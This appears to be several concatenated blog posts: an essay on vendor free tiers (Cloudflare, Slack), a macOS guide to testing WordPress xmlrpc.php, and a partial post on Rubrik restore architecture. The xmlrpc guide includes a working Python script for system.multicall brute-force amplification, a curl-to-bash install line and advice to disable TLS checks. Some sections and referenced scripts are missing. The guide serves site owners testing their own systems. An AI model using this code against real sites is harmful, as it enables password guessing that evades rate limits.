2.1 Security and Performance at the Edge
The foundation of the free tier is unmetered DDoS mitigation. Not capped, not throttled after a threshold, unmetered. For a personal blog or small business site, volumetric attacks are existential threats, and the fact that Cloudflare absorbs them at no cost is a remarkable statement of confidence in their own network scale. Sitting on top of that is a global CDN spanning over 300 cities, with free tier users on the same edge infrastructure as enterprise customers. SSL is automated, free, and renews without any manual intervention, making the secure default the effortless default. Five managed WAF rules covering the most critical OWASP categories are included, along with basic bot protection that handles the constant noise floor of scrapers, credential stuffers, and scanning bots that any public site attracts.
Caching deserves particular attention because for anyone running on a low end AWS instance type, and most personal blogs do exactly that, it is not a nice to have. It is life or death for the origin server. A t3.micro or t4g.small running WordPress has a hard ceiling. Under normal traffic patterns it holds up, but a post shared on LinkedIn with any momentum or picked up by a newsletter will send concurrent requests that a small instance simply cannot absorb. With Cloudflare caching absorbing the majority of that traffic, the origin barely notices the spike. I have watched this play out against andrewbaker.ninja more than once. The cache hit ratio in the analytics dashboard tells the story clearly: the origin handles a fraction of total requests while Cloudflare absorbs the rest. That is an availability and cost story simultaneously. Cache rules, custom TTLs, per-URL purging, and intelligent handling of query strings and cookies are all available on the free tier, giving you a degree of control that is not normally associated with a free offering.
2.2 Developer Capability and Operational Visibility
Beyond security and performance, the free tier extends into territory that genuinely surprises. Workers gives you serverless compute at the edge with 100,000 requests per day included, which is more than enough to build meaningful functionality: request transformation, custom authentication flows, A/B testing, and API proxying. In our case, it became a platform for building custom malware detection signals and traffic blocking logic that goes well beyond what a conventional WAF configuration could achieve. Cloudflare Pages adds free static site hosting with unlimited bandwidth and up to 500 builds per month, competitive with the best JAMstack platforms. DNS management sits on infrastructure widely regarded as the fastest authoritative DNS in the world, with DNSSEC and a clean management interface included at no cost.
The analytics layer is where Cloudflare makes a particularly interesting choice. Rather than gating visibility behind paid plans to obscure the value being delivered, the free tier shows you everything: requests, bandwidth, cache hit ratios, threats blocked by type, geographic traffic distribution, and real user Web Vitals data including Largest Contentful Paint and Cumulative Layout Shift from actual visitor sessions. For andrewbaker.ninja, the geographic breakdown alone was genuinely new information that shaped content decisions. Seeing threats blocked in real time makes the protection layer concrete rather than theoretical. Zero Trust Access rounds out the free offering with up to 50 users, giving hands-on experience with a ZTNA model that enterprise vendors charge significant per-user premiums to access.
One area where I would encourage Cloudflare to go further is 404 error tracking, which currently sits behind paid plans. A limited version tracking errors for just a handful of pages would cost them very little while giving free tier users a direct experience of the capability. The broader principle I would advocate is that every service in the Cloudflare catalogue should have at least a small free window. Exposure drives understanding, understanding drives advocacy, and advocacy drives enterprise pipeline far more reliably than any campaign.
3. The Strategic Value of Free Tier as a Leadership Development Tool
Let me be direct about what actually happened here. Cloudflare was already on my radar at Capitec, evaluated cautiously and with real reservations. What the free tier did was deepen my product knowledge far beyond what any enterprise evaluation process produces. I moved from understanding Cloudflare as a CDN with an API gateway to understanding it as a programmable edge platform with genuine security enforcement capability. That shift happened entirely through personal experimentation, at zero cost to Cloudflare beyond the infrastructure they were already running.
No sales team call produced that outcome. No analyst briefing, no conference sponsorship, no whitepaper. A free tier account for a personal blog did.
This is not a coincidence or a lucky edge case. It is the mechanism by which free tier compounds in value over time in ways that are almost impossible to model but entirely real. The person experimenting with your product on a side project today is accumulating product knowledge that travels with them across every context in which they operate, personal and professional simultaneously. When that person holds senior leadership responsibility, the intuitions built through free tier experimentation inform how they frame requirements, assess vendor claims, and evaluate architectural trade-offs. Crucially, that knowledge also provides resilience when a platform goes through a difficult period. I stayed with Cloudflare through the 2025 stability issues not because of a reassuring account manager call but because my own hands-on depth gave me enough architectural confidence to make an informed judgment rather than a reactive one.
The same pattern holds with AWS. My understanding of AWS architecture was built significantly through free tier experimentation. The 12 months of free tier access that AWS provides across a substantial catalogue of services is one of the smartest investments they have made in their developer ecosystem. My seven AWS certifications represent formal validation of knowledge that was built largely through hands-on experimentation the free tier enabled. When I evaluate AWS proposals at Capitec or advocate for specific AWS architectural patterns, that credibility traces back to free tier experience. No marketing budget produces that outcome.
Free tier products are, in effect, a leadership development programme that technology vendors run at their own expense. Every future CIO, CTO, or technology decision maker working their way up through an organisation is building instincts and preferences right now through the products they can access and experiment with freely. The vendors who understand this invest in those experiences. The vendors who do not are optimising for short-term revenue extraction at the cost of long-term pipeline development.
4. The Slack Cautionary Tale
Slack represents the opposite lesson, and it is worth examining honestly.
I used Slack’s free tier heavily for years. Across multiple communities, interest groups, and peer networks, Slack was the default platform precisely because the free tier was generous enough to make it viable for groups that could not or would not pay. It was through this extensive free tier use that I developed deep familiarity with the product, its integrations, its workflow automation capabilities, and its organisational model. That familiarity translated directly into Slack advocacy in enterprise contexts.
Then came a series of changes to the free tier. Message history limits became more restrictive. Integration constraints tightened. The experience of being a free tier user shifted from feeling like a valued participant in the platform ecosystem to feeling like someone being actively nudged toward payment.
The result was not that the communities I participated in upgraded to paid Slack. The result was that those communities moved to other platforms. Discord absorbed many of them. Some moved to Microsoft Teams. Others fragmented across different tools. In most cases the community did not reconstitute on Slack at a paid tier. It simply left.
The downstream consequence for Salesforce, which acquired Slack for approximately 27.7 billion dollars, is a meaningful erosion of exactly the pipeline that free tier usage was building. Every community organiser, technology professional, and business leader who built their Slack intuitions through free tier usage and then migrated to an alternative platform is now building comparable depth of knowledge on a competing product. The future enterprise purchasing decisions of those individuals will reflect that. Slack did not just lose free tier users. It cut off future sales pipeline development at the roots.
This is a cautionary tale that should sit prominently in the strategic planning conversations of any technology company considering changes to their free tier offering. The immediate revenue signal from restricting free tier is misleading. The long-term signal, which is harder to measure and slower to manifest, is the erosion of informed advocacy and the diversion of future decision makers toward alternatives.
5. Rethinking the Marketing Mix
I hold a view that is probably uncomfortable for most marketing organisations: technology companies should meaningfully reduce marketing spend in favour of free tier investment.
I understand why this is a hard argument to make internally. Marketing spend produces attributable metrics. Pipeline influenced, leads generated, impressions delivered. Free tier investment produces outcomes that are diffuse, long horizon, and resistant to attribution. The CIO who advocates for your platform in a 2028 procurement decision because they built something meaningful with your free tier in 2024 is almost impossible to trace back to that original free tier investment in any marketing analytics framework.
But the influence is real and it is durable in a way that no campaign achieves. You can say anything you want about a product through marketing. You can claim reliability, performance, security posture, developer experience, and operational simplicity until every available channel is saturated. None of it carries the weight of having used the product yourself, watched it perform under real conditions, seen it recover from real failures, and built genuine intuition about its architectural strengths and constraints.
There is also a fundamental misunderstanding embedded in how many enterprise technology vendors think about who actually buys their products. Most enterprise software is not bought by lawyers or sourcing teams. It is bought by engineers. Sourcing teams negotiate contracts and lawyers review them, but the decision about which platform gets shortlisted, which architecture gets proposed to leadership, and which vendor gets championed internally is made by the technical people who will live with the choice. Those people make their recommendations based on product knowledge, hands-on experience, and the intuition that comes from having actually built something with the technology. Embedding that knowledge in the market is not a nice to have. It is the primary sales motion, whether vendors recognise it or not. Every engineer who has meaningful free tier experience with your product is a potential internal champion in a future procurement cycle. Every engineer who has never touched your product, because the access gate was too high, is not.
Cloudflare has clearly internalised this. Their free tier is not a reluctant concession to market norms. It is a deliberate investment in developing the next generation of platform advocates. The breadth of capability they make available at no cost, spanning network security, edge compute, DNS, analytics, and Zero Trust access, reflects a confidence that the product will demonstrate its own value to the people who use it. That confidence is justified. It worked on me, though not in the way a typical marketing funnel would predict or model.
6. Conclusion
Free tier products close the distance between description and experience. They are the most honest form of marketing because they are not marketing at all. They are just the product, made accessible.
For Cloudflare, the free tier fundamentally changed how I understand the platform. I came in seeing a CDN with an API gateway. Personal experimentation with Workers, R2, and custom edge security logic revealed an architecture that is genuinely differentiated. The enterprise concerns around peering and the 2025 stability issues remained real, but the product depth I had built through free tier use meant those concerns could be weighed against a much clearer picture of what Cloudflare actually is at a platform level. That is a completely different evaluation from the one I would have made without it.
For Slack, the contraction of free tier generosity has had the opposite effect, redirecting communities and the professional development of their members toward competing platforms in ways that will compound as career trajectories advance.
The lesson is straightforward even if the organisational will to act on it is not. Invest in free tiers. Invest generously. The future pipeline you are building is less visible than the one your sales team can point to today, but it is deeper, more durable, and ultimately more valuable. Let people experience your product. Trust that it is good enough to speak for itself. If it is not, that is the more important problem to solve.
Andrew Baker is the Chief Information Officer at Capitec Bank in South Africa. He writes about enterprise architecture, cloud infrastructure, banking technology, and leadership at andrewbaker.ninja.
A Comprehensive Security Testing Guide for Mac Users
1. Introduction
WordPress xmlrpc.php is a legacy XML-RPC interface that enables remote connections to your WordPress site. While designed for legitimate integrations, this endpoint has become a major security concern due to its susceptibility to brute force attacks and amplification attacks. Understanding how to test your WordPress installation for these vulnerabilities is critical for maintaining site security.
In this guide, I’ll walk you through the technical details of xmlrpc.php vulnerabilities and provide practical Python scripts optimized for macOS that you can use to test your own WordPress site for exposure. This is essential knowledge for any WordPress site owner or administrator.
2. What is XMLRPC.PHP?
The xmlrpc.php file is part of WordPress core and implements the XML-RPC protocol, which allows external applications to communicate with your WordPress site. Common legitimate uses include:
Mobile app connections (WordPress mobile app)
Pingbacks and trackbacks from other sites
Remote publishing from desktop clients
Third party integrations and automation
However, attackers exploit this interface because it allows authentication attempts without the same rate limiting and monitoring that the standard WordPress login page receives.
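Before any deeper testing, it is worth a quick check that the endpoint is reachable at all. The probe below calls system.listMethods, which needs no credentials; the URL is a placeholder for your own site:

import requests

# system.listMethods requires no authentication; it simply asks the
# XML-RPC interface which methods it will accept
probe = """<?xml version="1.0"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>"""

response = requests.post("https://your-site.example/xmlrpc.php",
                         data=probe,
                         headers={"Content-Type": "text/xml"},
                         timeout=10)
print(response.status_code)                    # 200 means the endpoint answered
print("system.multicall" in response.text)     # True means the amplification method is exposed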
3. The Vulnerability: system.multicall Amplification
The most dangerous aspect of xmlrpc.php is the system.multicall method. This method allows an attacker to send multiple authentication attempts in a single HTTP request. While your WordPress login page might allow one authentication attempt per request, system.multicall can process hundreds or even thousands of login attempts in a single POST request.
Here’s why this is devastating:
Bypasses traditional rate limiting: Most firewalls and security plugins limit requests per IP, but a single request can contain 1000+ authentication attempts
Reduces network overhead: Attackers can test thousands of passwords with minimal bandwidth
Evades monitoring: Security logs may only show a handful of requests while thousands of passwords are being tested
DDoS amplification: Legitimate pingback functionality can be abused to create DDoS attacks against third party sites
4. Prerequisites for macOS
Before we begin testing, ensure your Mac has the necessary tools installed. macOS no longer ships a usable Python out of the box (Apple removed the bundled Python 2.7 in macOS 12.3, and /usr/bin/python3 is only a stub that offers to install the Xcode Command Line Tools), so you'll need to install Python 3 yourself, along with the requests library.
4.1. Verify Python Installation
Open Terminal (Applications > Utilities > Terminal) and run:
# Check whether a usable Python 3 is already on your PATH
python3 --version
# Install Homebrew if you don't have it
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python
brew install python
4.2. Install Required Python Libraries
Modern macOS versions use externally managed Python environments (PEP 668), so pip will refuse to install packages into the system interpreter. You have three options: a virtual environment, pipx, or forcing the install with pip's --break-system-packages flag.
Option 1: Use Python Virtual Environment (Recommended)
For the rest of this guide, we’ll assume you’re using Option 1 (virtual environment). This is the cleanest approach and won’t interfere with your system Python.
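A minimal setup, assuming the Homebrew Python from the previous step and a home directory environment (the xmlrpc-testing name is just an example):
# Create and activate an isolated environment for the testing scripts
python3 -m venv ~/xmlrpc-testing
source ~/xmlrpc-testing/bin/activate
# Install the only third party dependency the scripts need
pip install requests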
5. Testing Your WordPress Site
Before we dive into the code, it’s important to note that you should only test your own WordPress installations. Testing systems you don’t own or have explicit permission to test is illegal and unethical.
5.1. Quick Test Script
Let’s create a quick test script that runs the multicall amplification check end to end. The script will return a clear verdict on whether your site is vulnerable.
cat > ~/xmlrpc_poc.py << 'EOF'
#!/usr/bin/env python3
"""
WordPress XMLRPC Brute Force PoC for macOS
WARNING: Only use on your own site with test credentials!
"""
import requests
import sys
import time


class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    CYAN = '\033[96m'
    BOLD = '\033[1m'
    END = '\033[0m'


def test_multicall_amplification(url: str, username: str, password_count: int = 5) -> bool:
    """
    Demonstrate brute force amplification using system.multicall
    Returns: True if vulnerable to amplification, False otherwise
    """
    xmlrpc_url = f"{url}/xmlrpc.php"
    # Generate test passwords (intentionally wrong)
    test_passwords = [f"testpass{i}" for i in range(1, password_count + 1)]
    # Build the multicall payload: each call is a <value><struct> pair naming
    # the method (wp.getUsersBlogs forces an authentication check) and its params
    calls = []
    for password in test_passwords:
        call = f"""
        <value><struct>
          <member>
            <name>methodName</name>
            <value><string>wp.getUsersBlogs</string></value>
          </member>
          <member>
            <name>params</name>
            <value>
              <array>
                <data>
                  <value><string>{username}</string></value>
                  <value><string>{password}</string></value>
                </data>
              </array>
            </value>
          </member>
        </struct></value>
        """
        calls.append(call)
    payload = f"""<?xml version="1.0"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param>
      <value>
        <array>
          <data>
            {''.join(calls)}
          </data>
        </array>
      </value>
    </param>
  </params>
</methodCall>
"""
    headers = {"Content-Type": "text/xml"}
    try:
        print(f"\n{Colors.YELLOW}[*] Testing {password_count} passwords in a SINGLE request...{Colors.END}")
        start_time = time.time()
        response = requests.post(xmlrpc_url, data=payload, headers=headers, timeout=30)
        elapsed_time = time.time() - start_time
        print(f"{Colors.CYAN}[*] Request completed in {elapsed_time:.2f} seconds{Colors.END}")
        print(f"{Colors.CYAN}[*] Server processed {password_count} authentication attempts{Colors.END}")
        print(f"{Colors.CYAN}[*] All attempts were in ONE HTTP request{Colors.END}\n")
        # Per-call fault responses mean the server processed every attempt
        if "faultCode" in response.text or "Incorrect" in response.text:
            print(f"{Colors.RED}[!] VULNERABLE: system.multicall processed all attempts{Colors.END}")
            print(f"{Colors.RED}[!] Attackers can test hundreds/thousands of passwords per request{Colors.END}")
            return True
        else:
            print(f"{Colors.GREEN}[+] system.multicall appears to be blocked{Colors.END}")
            return False
    except Exception as e:
        print(f"{Colors.RED}[-] Error during amplification test: {e}{Colors.END}")
        return False


def main():
    if len(sys.argv) < 2:
        print(f"\n{Colors.BOLD}Usage:{Colors.END} python3 xmlrpc_poc.py <wordpress-url> [test_username] [password_count]")
        print(f"{Colors.BOLD}Example:{Colors.END} python3 xmlrpc_poc.py https://example.com testuser 10\n")
        print(f"{Colors.YELLOW}WARNING: Only test sites you own!{Colors.END}\n")
        sys.exit(1)
    url = sys.argv[1].rstrip('/')
    username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
    password_count = int(sys.argv[3]) if len(sys.argv) > 3 else 5
    print(f"\n{Colors.CYAN}{Colors.BOLD}{'=' * 70}{Colors.END}")
    print(f"{Colors.CYAN}{Colors.BOLD}WordPress XMLRPC Brute Force Amplification Test{Colors.END}")
    print(f"{Colors.CYAN}{Colors.BOLD}{'=' * 70}{Colors.END}")
    print(f"{Colors.BOLD}Target:{Colors.END} {url}")
    print(f"{Colors.BOLD}Test Username:{Colors.END} {username}")
    print(f"{Colors.BOLD}Password Attempts:{Colors.END} {password_count}")
    print(f"{Colors.RED}{Colors.BOLD}WARNING: Only test your own WordPress site!{Colors.END}")
    vulnerable = test_multicall_amplification(url, username, password_count)
    print(f"\n{Colors.CYAN}{'=' * 70}{Colors.END}")
    print(f"{Colors.BOLD}PROOF OF CONCEPT RESULT{Colors.END}")
    print(f"{Colors.CYAN}{'=' * 70}{Colors.END}\n")
    if vulnerable:
        print(f"{Colors.RED}{Colors.BOLD}VERDICT: VULNERABLE TO BRUTE FORCE AMPLIFICATION{Colors.END}\n")
        print(f"{Colors.BOLD}What this means:{Colors.END}")
        print(f"  • Attackers can test {password_count} passwords in 1 HTTP request")
        print("  • Scaling to 1000 passwords per request is trivial")
        print("  • Traditional rate limiting is bypassed")
        print("  • Your logs will show minimal suspicious activity\n")
        print(f"{Colors.RED}{Colors.BOLD}TAKE ACTION IMMEDIATELY{Colors.END}\n")
    else:
        print(f"{Colors.GREEN}{Colors.BOLD}VERDICT: PROTECTED{Colors.END}\n")
        print("Your site appears to have protections in place.\n")
    print(f"{Colors.CYAN}{'=' * 70}{Colors.END}\n")


if __name__ == "__main__":
    main()
EOF
chmod +x ~/xmlrpc_poc.py
Test with proof of concept (only on your own site!):
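# Run the PoC saved above: ten deliberately wrong passwords in one request
python3 ~/xmlrpc_poc.py https://your-site.com testuser 10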
If your tests reveal that your site is vulnerable, take action and then keep watching the endpoint. These instructions assume you’re managing your WordPress site from your Mac; the crontab entry below schedules an hourly run of an xmlrpc monitoring script.
# Open crontab editor
crontab -e
# Add this line:
# 0 * * * * /Users/yourusername/xmlrpc_monitor_cron.sh
8. Real World Attack Scenarios
Understanding how these attacks work in practice helps illustrate the severity:
8.1. Credential Stuffing Attack
Attackers use system.multicall to test stolen credentials from data breaches. A single request can test 1000 username/password combinations, making the attack incredibly efficient and hard to detect.
8.2. DDoS Amplification
Attackers abuse the pingback.ping method to make your WordPress site send requests to a victim’s server. Since your site has more bandwidth than the attacker, this amplifies the DDoS attack.
8.3. Resource Exhaustion
Even without successful authentication, processing thousands of multicall requests can overload your database and PHP processes, causing legitimate site slowdowns or crashes.
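Before worrying about these scenarios, it is worth checking which of these attack surfaces your endpoint actually exposes. A minimal sketch using the standard system.listMethods call (substitute your own site URL for the placeholder):
import requests

payload = """<?xml version="1.0"?>
<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"""
response = requests.post("https://your-site.com/xmlrpc.php",
                         data=payload,
                         headers={"Content-Type": "text/xml"},
                         timeout=10)
# If these appear in the returned method list, the scenarios above are live
for method in ("system.multicall", "pingback.ping"):
    status = "exposed" if method in response.text else "not listed"
    print(f"{method}: {status}")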
9. Additional Security Best Practices for Mac WordPress Admins
If you are testing a staging site with a self-signed certificate, requests will refuse the TLS connection. For test environments only, you can disable verification in the scripts:
# Add this to your scripts after the imports
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Then pass verify=False on each request:
response = requests.post(xmlrpc_url, data=payload, headers=headers, verify=False, timeout=10)
If a script won’t run, check that it is executable, or invoke it through the interpreter:
# Make sure scripts are executable
chmod +x ~/xmlrpc_test.py
# Or run with python3 directly
python3 ~/xmlrpc_test.py https://example.com
11. Conclusion
The WordPress XMLRPC.PHP interface represents a significant security risk that many site owners are unaware of. The system.multicall method’s ability to amplify brute force attacks by several orders of magnitude makes it a favorite tool for attackers.
By using the macOS optimized testing scripts provided in this guide, you can quickly determine whether your WordPress sites are vulnerable. The color coded output and clear vulnerability verdicts make it easy to understand your security posture at a glance.
Key Takeaways
Test regularly: Run the main test script monthly on all your WordPress sites
Act on findings: If the script returns a VULNERABLE verdict, take immediate action
Disable when possible: XMLRPC should be disabled unless you have a specific need for it
Monitor continuously: Set up automated monitoring to catch attacks early
Layer your security: Use multiple protection methods (firewall + plugin + monitoring)
# Quick test of a single site
~/xmlrpc_test.py https://your-site.com
# Proof of concept demonstration
~/xmlrpc_poc.py https://your-site.com testuser 10
# Batch test multiple sites
~/xmlrpc_batch_test.py ~/wordpress_sites.txt
# Monitor server logs for attacks
~/check_xmlrpc_attacks.sh ~/access.log 10
Remember: Security is an ongoing process, not a one time fix. Stay vigilant and keep your WordPress installations protected.
All scripts in this guide are for educational and security testing purposes only. Always obtain proper authorization before testing any system, and only test WordPress sites that you own or have explicit permission to assess.
1. Backups Should Be Boring (and That Is the Point)
Backups are boring. They should be boring. A backup system that generates excitement is usually signalling failure.
The only time backups become interesting is when they are missing, and that interest level is lethal. Emergency bridges. Frozen change windows. Executive escalation. Media briefings. Regulatory apology letters. Engineers being asked questions that have no safe answers.
Most backup platforms are built for the boring days. Rubrik is designed for the day boredom ends.
2. Backup Is Not the Product. Restore Is.
Many organisations still evaluate backup platforms on the wrong metric: how fast they can copy data somewhere else.
That metric is irrelevant during an incident.
When things go wrong, the only questions that matter are:
What can I restore?
How fast can it be used?
How many restores can run in parallel?
How little additional infrastructure is required?
Rubrik treats restore as the primary product, not a secondary feature.
3. Architectural Starting Point: Designed for Failure, Not Demos
Rubrik was built without tape era assumptions. There is no central backup server, no serial job controller, and no media server bottleneck. Instead, it uses a distributed, scale out architecture with a global metadata index and a stateless policy engine.
Restore becomes a metadata lookup problem, not a job replay problem. This distinction is invisible in demos and decisive during outages.
4. Performance Metrics That Actually Matter
Backup throughput is easy to optimise and easy to market. Restore performance is constrained by network fan out, restore concurrency, control plane orchestration, and application host contention.
Rubrik addresses this by default through parallel restore streams, linear scaling with node count, and minimal control plane chatter. Restore performance becomes predictable rather than optimistic.
5. Restore Semantics That Match Reality
The real test of any backup platform is not how elegantly it captures data, but how usefully it returns that data when needed. This is where architectural decisions made years earlier either pay dividends or extract penalties.
5.1 Instant Access Instead of Full Rehydration
Rubrik does not require full data copy back before access. It supports live mount of virtual machines, database mounts directly from backup storage, and file system mounts for selective recovery.
The recovery model becomes access first, copy later if needed. This is the difference between minutes and hours when production is down.
5.2 Dropping a Table Should Not Be a Crisis
Rubrik understands databases as structured systems, not opaque blobs.
It supports table level restores for SQL Server, mounting a database backup as a live database, extracting tables or schemas without restoring the full database, and point in time recovery without rollback.
Accidental table drops should be operational annoyances, not existential threats.
5.3 Supported Database Engines
Rubrik provides native protection for the major enterprise database platforms:
Database Engine | Live Mount | Point in Time Recovery | Key Constraints
Microsoft SQL Server | Yes | Yes (transaction log replay) | SQL 2012+ supported; Always On AG, FCI, standalone
Oracle Database | Yes | Yes (archive log replay) | RAC, Data Guard, Exadata supported; SPFILE required for automated recovery
SAP HANA | No | Yes | Backint API integration; uses native HANA backup scheduling
PostgreSQL | No | Yes (up to 5 minute RPO) | File level incremental; on premises and cloud (AWS, Azure, GCP)
IBM Db2 | Via Elastic App Service | Yes | Uses native Db2 backup utilities
MongoDB | Via Elastic App Service | Yes | Sharded and unsharded clusters; no quiescing required
MySQL | Via Elastic App Service | Yes | Uses native MySQL backup tools
Cassandra | Via Elastic App Service | Yes | Via Rubrik Datos IO integration
The distinction between native integration and Elastic App Service matters operationally. Native integration means Rubrik handles discovery, scheduling, and orchestration directly. Elastic App Service means Rubrik provides managed volumes as backup targets while the database’s native tools handle the actual backup process. Both approaches deliver immutability and policy driven retention, but the operational experience differs.
5.4 Live Mount: Constraints and Caveats
Live Mount is Rubrik’s signature capability—mounting backups as live, queryable databases without copying data back to production storage. The database runs with its data files served directly from the Rubrik cluster over NFS (for Oracle) or SMB 3.0 (for SQL Server).
This capability is transformative for specific use cases. It is not a replacement for production storage.
What Live Mount Delivers:
Near instant database availability (seconds to minutes, regardless of database size)
Zero storage provisioning on the target host
Multiple concurrent mounts from the same backup
Point in time access across the entire retention window
Ideal for granular recovery, DBCC health checks, test/dev cloning, audit queries, and upgrade validation
What Live Mount Does Not Deliver:
Production grade I/O performance
High availability during Rubrik cluster maintenance
Persistence across host or cluster reboots
IOPS Constraints:
Live Mount performance is bounded by the Rubrik appliance’s ability to serve I/O, not by the target host’s storage subsystem. Published figures suggest approximately 30,000 IOPS per Rubrik appliance for Live Mount workloads. This is adequate for reporting queries, data extraction, and validation testing. It is not adequate for transaction heavy production workloads.
The performance characteristics are inherently different from production storage:
Metric | Production SAN/Flash | Rubrik Live Mount
Random read IOPS | 100,000+ | ~30,000 per appliance
Latency profile | Sub millisecond | Network + NFS overhead
Write optimisation | Production tuned | Backup optimised
Concurrent workloads | Designed for contention | Shared with backup operations
SQL Server Live Mount Specifics:
Databases mount via SMB 3.0 shares with UNC paths
Transaction log replay occurs during mount for point in time positioning
The mounted database is read write, but writes go to the Rubrik cluster
Supported for standalone instances, Failover Cluster Instances, and Always On Availability Groups
Table level recovery requires mounting the database, then using T SQL to extract and import specific objects
Oracle Live Mount Specifics:
Data files mount via NFS; redo logs and control files remain on the target host
Automated recovery requires source and target configurations to match (RAC to RAC, single instance to single instance, ASM to ASM)
Files only recovery allows dissimilar configurations but requires DBA managed RMAN recovery
SPFILE is required for automated recovery; PFILE databases require manual intervention
Block change tracking (BCT) is disabled on Live Mount targets
Live Mount fails if the target host, RAC cluster, or Rubrik cluster reboots during the mount—requiring forced unmount to clean up metadata
Direct NFS (DNFS) is recommended on Oracle RAC nodes for improved recovery performance
What Live Mount Is Not:
Live Mount is explicitly designed for temporary access, not sustained production workloads. The use cases Rubrik markets—test/dev, DBCC validation, granular recovery, audit queries—all share a common characteristic: they are time bounded operations that tolerate moderate I/O performance in exchange for instant availability.
Running production transaction processing against a Live Mount database would be technically possible and operationally inadvisable. The I/O profile, the network dependency, and the lack of high availability guarantees make it unsuitable for workloads where performance and uptime matter.
5.5 The Recovery Hierarchy
Understanding when to use each recovery method matters:
Recovery Need | Recommended Method | Time to Access | Storage Required
Extract specific rows/tables | Live Mount + query | Minutes | None
Validate backup integrity | Live Mount + DBCC | Minutes | None
Clone for test/dev | Live Mount | Minutes | None
Full database replacement | Export/Restore | Hours (size dependent) | Full database size
Disaster recovery cutover | Instant Recovery | Minutes (then migrate) | Temporary, then full
The strategic value of Live Mount is avoiding full restores when full restores are unnecessary. For a 5TB database where someone dropped a single table, Live Mount means extracting that table in minutes rather than waiting hours for a complete restore.
For actual disaster recovery, where the production database is gone and must be replaced, Live Mount provides bridge access while the full restore completes in parallel. The database is queryable immediately; production grade performance follows once data migration finishes.
5.6 The Hidden Failure Mode After a Successful Restore
Rubrik is not deployed in a single explosive moment. In the real world, it is rolled out carefully over weeks. Systems are onboarded one by one, validated, and then left to settle. Each system performs a single full backup, after which life becomes calm and predictable. From that point forward, everything is incremental. Deltas are small, backup windows shrink, networks breathe easily, and the platform looks deceptively relaxed.
This operating state creates a dangerous illusion.
After a large scale recovery event, you will spend hours restoring systems. That work feels like the crisis. It is not. The real stress event happens later, quietly, on the first night after the restores complete. Every restored system now believes it is brand new. Every one of them schedules a full backup. At that moment, your entire estate attempts to perform a first full backup simultaneously while still serving live traffic.
This is the point where Rubrik appliances, networks, and upstream storage experience their true failure conditions. Not during the restore, but after it. Massive ingest rates, saturated links, constrained disk, and queueing effects all arrive at once. If this scenario is not explicitly planned for, the recovery that looked successful during the day can cascade into instability overnight.
Recovery planning therefore cannot stop at restore completion. Backup re entry must be treated as a first class recovery phase. In most environments, the only viable strategy is to deliberately phase backup schedules over multiple days following a large scale restore. Systems must be staggered back into protection in controlled waves, rather than allowed to collide into a single catastrophic full backup storm.
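One way to make that phasing concrete is to treat it as a capacity packing problem. The sketch below is illustrative only: the system names, full backup sizes, and nightly ingest ceiling are all assumptions you would replace with your own estate’s numbers.
# Illustrative sketch: pack restored systems into nightly re-protection waves
systems = [("erp-db", 40), ("crm-db", 12), ("files-01", 25),
           ("web-farm", 8), ("dwh", 60)]   # (name, first full backup size, TB)
ingest_per_night_tb = 50                   # assumed sustainable nightly ingest

waves, current, used = [], [], 0
for name, size in sorted(systems, key=lambda s: -s[1]):  # largest first
    if current and used + size > ingest_per_night_tb:
        waves.append(current)
        current, used = [], 0
    current.append(name)
    used += size
waves.append(current)

for night, wave in enumerate(waves, 1):
    print(f"Night {night}: re-enable backups for {', '.join(wave)}")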
Restore is the product. But what comes after restore is where architectures either hold, or quietly collapse.
6. Why Logical Streaming Is a Design Failure
Traditional restore models stream backup data through the database host. This guarantees CPU contention, IO pressure, and restore times proportional to database size rather than change size.
Figure 1 illustrates this contrast clearly. Traditional restore requires data to be copied back through the database server, creating high I/O, CPU and network load with correspondingly long restore times. Rubrik’s Live Mount approach mounts the backup copy directly, achieving near zero RTO with minimal data movement. The difference between these approaches becomes decisive when production is down and every minute of restore time translates to business impact.
Rubrik avoids this by mounting database images and extracting only required objects. The database host stops being collateral damage during recovery.
6.1 The VSS Tax: Why SQL Server Backups Cannot Escape Application Coordination
For VMware workloads without databases, Rubrik can leverage storage level snapshots that are instantaneous, application agnostic, and impose zero load on the guest operating system. The hypervisor freezes the VM state, the storage array captures the point in time image, and the backup completes before the application notices.
SQL Server cannot offer this simplicity. The reason is not a Microsoft limitation or a Rubrik constraint. The reason is transactional consistency.
6.1.1 The Crash Consistent Option Exists
Nothing technically prevents Rubrik, or any backup tool, from taking a pure storage snapshot of a SQL Server volume without application coordination. The snapshot would complete in milliseconds with zero database load.
The problem is what you would recover: a crash consistent image, not an application consistent one.
A crash consistent snapshot captures storage state mid flight. This includes partially written pages, uncommitted transactions, dirty buffers not yet flushed to disk, and potentially torn writes caught mid I/O. SQL Server is designed to recover from exactly this state. Every time the database engine starts after an unexpected shutdown, it runs crash recovery, rolling forward committed transactions from the log and rolling back uncommitted ones.
The database will become consistent. Eventually. Probably.
6.1.2 Why Probably Is Not Good Enough
Crash recovery works. It works reliably. It is tested millions of times daily across every SQL Server instance that experiences an unclean shutdown.
But restore confidence matters. When production is down and executives are asking questions, the difference between “this backup is guaranteed consistent” and “this backup should recover correctly after crash recovery completes” is operationally significant.
VSS exists to eliminate that uncertainty.
6.1.3 What VSS Actually Does
When a backup application requests an application consistent SQL Server snapshot, the sequence shown in Figure 2 executes. The backup server sends a signal through VSS Orchestration, which triggers the SQL Server VSS Writer to prepare the database. This preparation involves flushing dirty pages to storage, hardening transaction logs, and momentarily freezing I/O. Only then does the storage-level snapshot execute, capturing a point-in-time consistent image that requires no crash recovery on restore.
The result is a snapshot that requires no crash recovery on restore. The database is immediately consistent, immediately usable, and carries no uncertainty about transactional integrity.
6.1.4 The Coordination Cost
The VSS freeze window is typically brief, milliseconds to low seconds. But the preparation is not free.
Buffer pool flushes on large databases generate I/O pressure. Checkpoint operations compete with production workloads. The freeze, however short, introduces latency for in flight transactions. The database instance is actively participating in its own backup.
For databases measured in terabytes, with buffer pools consuming hundreds of gigabytes, this coordination overhead becomes operationally visible. Backup windows that appear instantaneous from the storage console are hiding real work inside the SQL Server instance.
6.1.5 The Architectural Asymmetry
This creates a fundamental difference in backup elegance across workload types:
Workload Type | Backup Method | Application Load | Restore State
